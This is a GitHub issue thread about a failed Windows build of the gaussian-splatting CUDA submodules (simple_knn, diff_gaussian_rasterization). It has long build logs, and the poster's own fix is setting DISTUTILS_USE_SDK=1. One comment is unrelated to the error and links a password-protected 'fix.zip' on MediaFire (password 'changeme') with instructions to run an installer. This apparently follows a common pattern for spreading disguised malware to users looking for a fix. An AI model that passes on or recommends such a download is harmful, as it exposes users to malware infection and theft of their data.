### ISSUE TITLE
CondaEnvException: Pip failed | Encountered error while trying to install package. ╰─> simple_knn

### ISSUE THREAD

**Issue by NeroPop** [graphdeco-inria/gaussian-splatting#956]
I keep running into this error. I'm running CUDA 11.8 and Microsoft Visual Studio 2022 v17.8. Everything should be added to path properly and I tried installing pytorch and Ninja separately. I thought it was due to me using Visual Sudio 2022 instead of 2019 but I can't seem to downgrade to 2019 and be able to choose Desktop development with C++. I tried starting from scratch again on another PC and found the exact same problem although that was before I knew about backdating Visual Studio to 2022 v 17.8.13 since according to google in 17.10 CUDA 11.8 lost support. Please let me know if you know how to fix this? I've been trying for so long now haha.

````
(base) C:\Users\jmyrick\gaussian-splatting>conda env create --file environment.yml
Channels:
 - pytorch
 - conda-forge
 - defaults
Platform: win-64
Collecting package metadata (repodata.json): done
Solving environment: done

Downloading and Extracting Packages:

Preparing transaction: done
Verifying transaction: done
Executing transaction: / "By downloading and using the CUDA Toolkit conda packages, you accept the terms and conditions

done
Installing pip dependencies: \ Ran pip subprocess with arguments:
['C:\\Users\\jmyrick\\.conda\\envs\\gaussian_splatting\\python.exe', '-m', 'pip', 'install', '-U', '-r', 'C:\\Users\\jm]
Pip subprocess output:
Processing c:\users\jmyrick\gaussian-splatting\submodules\diff-gaussian-rasterization
  Preparing metadata (setup.py): started
  Preparing metadata (setup.py): finished with status 'done'
Processing c:\users\jmyrick\gaussian-splatting\submodules\simple-knn
  Preparing metadata (setup.py): started
  Preparing metadata (setup.py): finished with status 'done'
Building wheels for collected packages: diff_gaussian_rasterization, simple_knn
  Building wheel for diff_gaussian_rasterization (setup.py): started
  Building wheel for diff_gaussian_rasterization (setup.py): finished with status 'error'
  Running setup.py clean for diff_gaussian_rasterization
  Building wheel for simple_knn (setup.py): started
  Building wheel for simple_knn (setup.py): finished with status 'error'
  Running setup.py clean for simple_knn
Failed to build diff_gaussian_rasterization simple_knn
Installing collected packages: simple_knn, diff_gaussian_rasterization
  Running setup.py install for simple_knn: started
  Running setup.py install for simple_knn: finished with status 'error'

Pip subprocess error:
  error: subprocess-exited-with-error

  × python setup.py bdist_wheel did not run successfully.
  │ exit code: 1
  ╰─> [105 lines of output]
      running bdist_wheel
      running build
      running build_py
      creating build
      creating build\lib.win-amd64-cpython-37
      creating build\lib.win-amd64-cpython-37\diff_gaussian_rasterization
      copying diff_gaussian_rasterization\__init__.py -> build\lib.win-amd64-cpython-37\diff_gaussian_rasterization
      running build_ext
      C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py:813: UserWarning: .
        warnings.warn(CUDA_MISMATCH_WARN.format(cuda_str_version, torch.version.cuda))
      building 'diff_gaussian_rasterization._C' extension
      creating C:\Users\jmyrick\gaussian-splatting\submodules\diff-gaussian-rasterization\build\temp.win-amd64-cpython-7
      creating C:\Users\jmyrick\gaussian-splatting\submodules\diff-gaussian-rasterization\build\temp.win-amd64-cpython-e
      creating C:\Users\jmyrick\gaussian-splatting\submodules\diff-gaussian-rasterization\build\temp.win-amd64-cpython-r
      Emitting ninja build file C:\Users\jmyrick\gaussian-splatting\submodules\diff-gaussian-rasterization\build\temp.w.
      Compiling objects...
      Allowing ninja to set a default number of workers... (overridable by setting the environment variable MAX_JOBS=N)
      [1/5] cl /showIncludes /nologo /O2 /W3 /GL /DNDEBUG /MD /MD /wd4819 /wd4251 /wd4244 /wd4267 /wd4275 /wd4018 /wd414
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/diff-gaussian-rasterization/build/temp.win-amd64-cpython-3j
      cl /showIncludes /nologo /O2 /W3 /GL /DNDEBUG /MD /MD /wd4819 /wd4251 /wd4244 /wd4267 /wd4275 /wd4018 /wd4190 /EH4
      C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\include\torch\csrc\api\include\torch/cuday
      [2/5] C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --de6
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/diff-gaussian-rasterization/build/temp.win-amd64-cpython-3j
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --dependen6
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\include\crt/host_config.h(231): fatal error C1083: Cannoy
      backward.cu
      [3/5] C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --de6
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/diff-gaussian-rasterization/build/temp.win-amd64-cpython-3j
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --dependen6
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\include\crt/host_config.h(231): fatal error C1083: Cannoy
      rasterizer_impl.cu
      [4/5] C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --de6
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/diff-gaussian-rasterization/build/temp.win-amd64-cpython-3j
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --dependen6
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\include\crt/host_config.h(231): fatal error C1083: Cannoy
      forward.cu
      [5/5] C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --de6
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/diff-gaussian-rasterization/build/temp.win-amd64-cpython-3j
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --dependen6
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\include\crt/host_config.h(231): fatal error C1083: Cannoy
      rasterize_points.cu
      ninja: build stopped: subcommand failed.
      Traceback (most recent call last):
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 181d
          env=env)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\subprocess.py", line 512, in run
          output=stdout, stderr=stderr)
      subprocess.CalledProcessError: Command '['ninja', '-v']' returned non-zero exit status 1.

      The above exception was the direct cause of the following exception:

      Traceback (most recent call last):
        File "<string>", line 36, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "C:\Users\jmyrick\gaussian-splatting\submodules\diff-gaussian-rasterization\setup.py", line 32, in <module>
          'build_ext': BuildExtension
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\__init__.py", line 103, in sp
          return distutils.core.setup(**attrs)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\core.py", line 18p
          return run_commands(dist)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\core.py", line 20s
          dist.run_commands()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 96s
          self.run_command(cmd)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\dist.py", line 963, in run_cd
          super().run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 98d
          cmd_obj.run()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\wheel\bdist_wheel.py", line 368, in run
          self.run_command("build")
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\cmd.py", line 318d
          self.distribution.run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\dist.py", line 963, in run_cd
          super().run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 98d
          cmd_obj.run()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build.py"n
          self.run_command(cmd_name)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\cmd.py", line 318d
          self.distribution.run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\dist.py", line 963, in run_cd
          super().run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 98d
          cmd_obj.run()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\command\build_ext.py", line n
          _build_ext.run(self)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_extn
          self.build_extensions()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 765s
          build_ext.build_extensions(self)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_exts
          self._build_extensions_serial()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_extl
          self.build_extension(ext)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\command\build_ext.py", line n
          _build_ext.build_extension(self, ext)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_extn
          depends=ext.depends,
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 747e
          with_cuda=with_cuda)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 149s
          error_prefix='Error compiling objects for extension')
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 182d
          raise RuntimeError(message) from e
      RuntimeError: Error compiling objects for extension
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for diff_gaussian_rasterization
  error: subprocess-exited-with-error

  × python setup.py bdist_wheel did not run successfully.
  │ exit code: 1
  ╰─> [90 lines of output]
      running bdist_wheel
      running build
      running build_ext
      C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py:813: UserWarning: .
        warnings.warn(CUDA_MISMATCH_WARN.format(cuda_str_version, torch.version.cuda))
      building 'simple_knn._C' extension
      creating C:\Users\jmyrick\gaussian-splatting\submodules\simple-knn\build
      creating C:\Users\jmyrick\gaussian-splatting\submodules\simple-knn\build\temp.win-amd64-cpython-37
      creating C:\Users\jmyrick\gaussian-splatting\submodules\simple-knn\build\temp.win-amd64-cpython-37\Release
      Emitting ninja build file C:\Users\jmyrick\gaussian-splatting\submodules\simple-knn\build\temp.win-amd64-cpython-.
      Compiling objects...
      Allowing ninja to set a default number of workers... (overridable by setting the environment variable MAX_JOBS=N)
      [1/3] cl /showIncludes /nologo /O2 /W3 /GL /DNDEBUG /MD /MD /wd4819 /wd4251 /wd4244 /wd4267 /wd4275 /wd4018 /wd414
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/simple-knn/build/temp.win-amd64-cpython-37/Release/ext.obj
      cl /showIncludes /nologo /O2 /W3 /GL /DNDEBUG /MD /MD /wd4819 /wd4251 /wd4244 /wd4267 /wd4275 /wd4018 /wd4190 /EH4
      C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\include\torch\csrc\api\include\torch/cuday
      [2/3] C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --de6
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/simple-knn/build/temp.win-amd64-cpython-37/Release/simple_j
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --dependen6
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\include\crt/host_config.h(231): fatal error C1083: Cannoy
      simple_knn.cu
      [3/3] C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --de6
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/simple-knn/build/temp.win-amd64-cpython-37/Release/spatialj
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --dependen6
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\include\crt/host_config.h(231): fatal error C1083: Cannoy
      spatial.cu
      ninja: build stopped: subcommand failed.
      Traceback (most recent call last):
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 181d
          env=env)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\subprocess.py", line 512, in run
          output=stdout, stderr=stderr)
      subprocess.CalledProcessError: Command '['ninja', '-v']' returned non-zero exit status 1.

      The above exception was the direct cause of the following exception:

      Traceback (most recent call last):
        File "<string>", line 36, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "C:\Users\jmyrick\gaussian-splatting\submodules\simple-knn\setup.py", line 33, in <module>
          'build_ext': BuildExtension
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\__init__.py", line 103, in sp
          return distutils.core.setup(**attrs)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\core.py", line 18p
          return run_commands(dist)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\core.py", line 20s
          dist.run_commands()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 96s
          self.run_command(cmd)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\dist.py", line 963, in run_cd
          super().run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 98d
          cmd_obj.run()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\wheel\bdist_wheel.py", line 368, in run
          self.run_command("build")
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\cmd.py", line 318d
          self.distribution.run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\dist.py", line 963, in run_cd
          super().run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 98d
          cmd_obj.run()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build.py"n
          self.run_command(cmd_name)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\cmd.py", line 318d
          self.distribution.run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\dist.py", line 963, in run_cd
          super().run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 98d
          cmd_obj.run()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\command\build_ext.py", line n
          _build_ext.run(self)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_extn
          self.build_extensions()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 765s
          build_ext.build_extensions(self)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_exts
          self._build_extensions_serial()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_extl
          self.build_extension(ext)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\command\build_ext.py", line n
          _build_ext.build_extension(self, ext)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_extn
          depends=ext.depends,
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 747e
          with_cuda=with_cuda)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 149s
          error_prefix='Error compiling objects for extension')
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 182d
          raise RuntimeError(message) from e
      RuntimeError: Error compiling objects for extension
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for simple_knn
  error: subprocess-exited-with-error

  × Running setup.py install for simple_knn did not run successfully.
  │ exit code: 1
  ╰─> [105 lines of output]
      running install
      C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\cmd.py:66: SetuptoolsDepr.
      !!

              ********************************************************************************
              Please avoid running ``setup.py`` directly.
              Instead, use pypa/build, pypa/installer or other
              standards-based tools.

              See https://blog.ganssle.io/articles/2021/10/setup-py-deprecated.html for details.
              ********************************************************************************

      !!
        self.initialize_options()
      running build
      running build_ext
      C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py:813: UserWarning: .
        warnings.warn(CUDA_MISMATCH_WARN.format(cuda_str_version, torch.version.cuda))
      building 'simple_knn._C' extension
      creating C:\Users\jmyrick\gaussian-splatting\submodules\simple-knn\build
      creating C:\Users\jmyrick\gaussian-splatting\submodules\simple-knn\build\temp.win-amd64-cpython-37
      creating C:\Users\jmyrick\gaussian-splatting\submodules\simple-knn\build\temp.win-amd64-cpython-37\Release
      Emitting ninja build file C:\Users\jmyrick\gaussian-splatting\submodules\simple-knn\build\temp.win-amd64-cpython-.
      Compiling objects...
      Allowing ninja to set a default number of workers... (overridable by setting the environment variable MAX_JOBS=N)
      [1/3] cl /showIncludes /nologo /O2 /W3 /GL /DNDEBUG /MD /MD /wd4819 /wd4251 /wd4244 /wd4267 /wd4275 /wd4018 /wd414
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/simple-knn/build/temp.win-amd64-cpython-37/Release/ext.obj
      cl /showIncludes /nologo /O2 /W3 /GL /DNDEBUG /MD /MD /wd4819 /wd4251 /wd4244 /wd4267 /wd4275 /wd4018 /wd4190 /EH4
      C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\include\torch\csrc\api\include\torch/cuday
      [2/3] C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --de6
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/simple-knn/build/temp.win-amd64-cpython-37/Release/spatialj
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --dependen6
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\include\crt/host_config.h(231): fatal error C1083: Cannoy
      spatial.cu
      [3/3] C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --de6
      FAILED: C:/Users/jmyrick/gaussian-splatting/submodules/simple-knn/build/temp.win-amd64-cpython-37/Release/simple_j
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\bin\nvcc --generate-dependencies-with-compile --dependen6
      C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v11.8\include\crt/host_config.h(231): fatal error C1083: Cannoy
      simple_knn.cu
      ninja: build stopped: subcommand failed.
      Traceback (most recent call last):
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 181d
          env=env)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\subprocess.py", line 512, in run
          output=stdout, stderr=stderr)
      subprocess.CalledProcessError: Command '['ninja', '-v']' returned non-zero exit status 1.

      The above exception was the direct cause of the following exception:

      Traceback (most recent call last):
        File "<string>", line 36, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "C:\Users\jmyrick\gaussian-splatting\submodules\simple-knn\setup.py", line 33, in <module>
          'build_ext': BuildExtension
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\__init__.py", line 103, in sp
          return distutils.core.setup(**attrs)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\core.py", line 18p
          return run_commands(dist)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\core.py", line 20s
          dist.run_commands()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 96s
          self.run_command(cmd)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\dist.py", line 963, in run_cd
          super().run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 98d
          cmd_obj.run()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\command\install.py", line 78n
          return orig.install.run(self)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\install.pn
          self.run_command('build')
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\cmd.py", line 318d
          self.distribution.run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\dist.py", line 963, in run_cd
          super().run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 98d
          cmd_obj.run()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build.py"n
          self.run_command(cmd_name)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\cmd.py", line 318d
          self.distribution.run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\dist.py", line 963, in run_cd
          super().run_command(command)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\dist.py", line 98d
          cmd_obj.run()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\command\build_ext.py", line n
          _build_ext.run(self)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_extn
          self.build_extensions()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 765s
          build_ext.build_extensions(self)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_exts
          self._build_extensions_serial()
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_extl
          self.build_extension(ext)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\command\build_ext.py", line n
          _build_ext.build_extension(self, ext)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\setuptools\_distutils\command\build_extn
          depends=ext.depends,
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 747e
          with_cuda=with_cuda)
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 149s
          error_prefix='Error compiling objects for extension')
        File "C:\Users\jmyrick\.conda\envs\gaussian_splatting\lib\site-packages\torch\utils\cpp_extension.py", line 182d
          raise RuntimeError(message) from e
      RuntimeError: Error compiling objects for extension
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
error: legacy-install-failure

× Encountered error while trying to install package.
╰─> simple_knn

note: This is an issue with the package mentioned above, not pip.
hint: See above for output from the failure.

failed

CondaEnvException: Pip failed`
```

**Comment by rodeok** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haakongarfjell** [comment]
I'm having the same issue using Visual Studio 2022 17.11.2 and CUDA 11.8. Let me know if you figure it out

**Comment by NeroPop** [comment]
Solved by running `SET DISTUTILS_USE_SDK=1` in cmd before opening Anaconda base environment
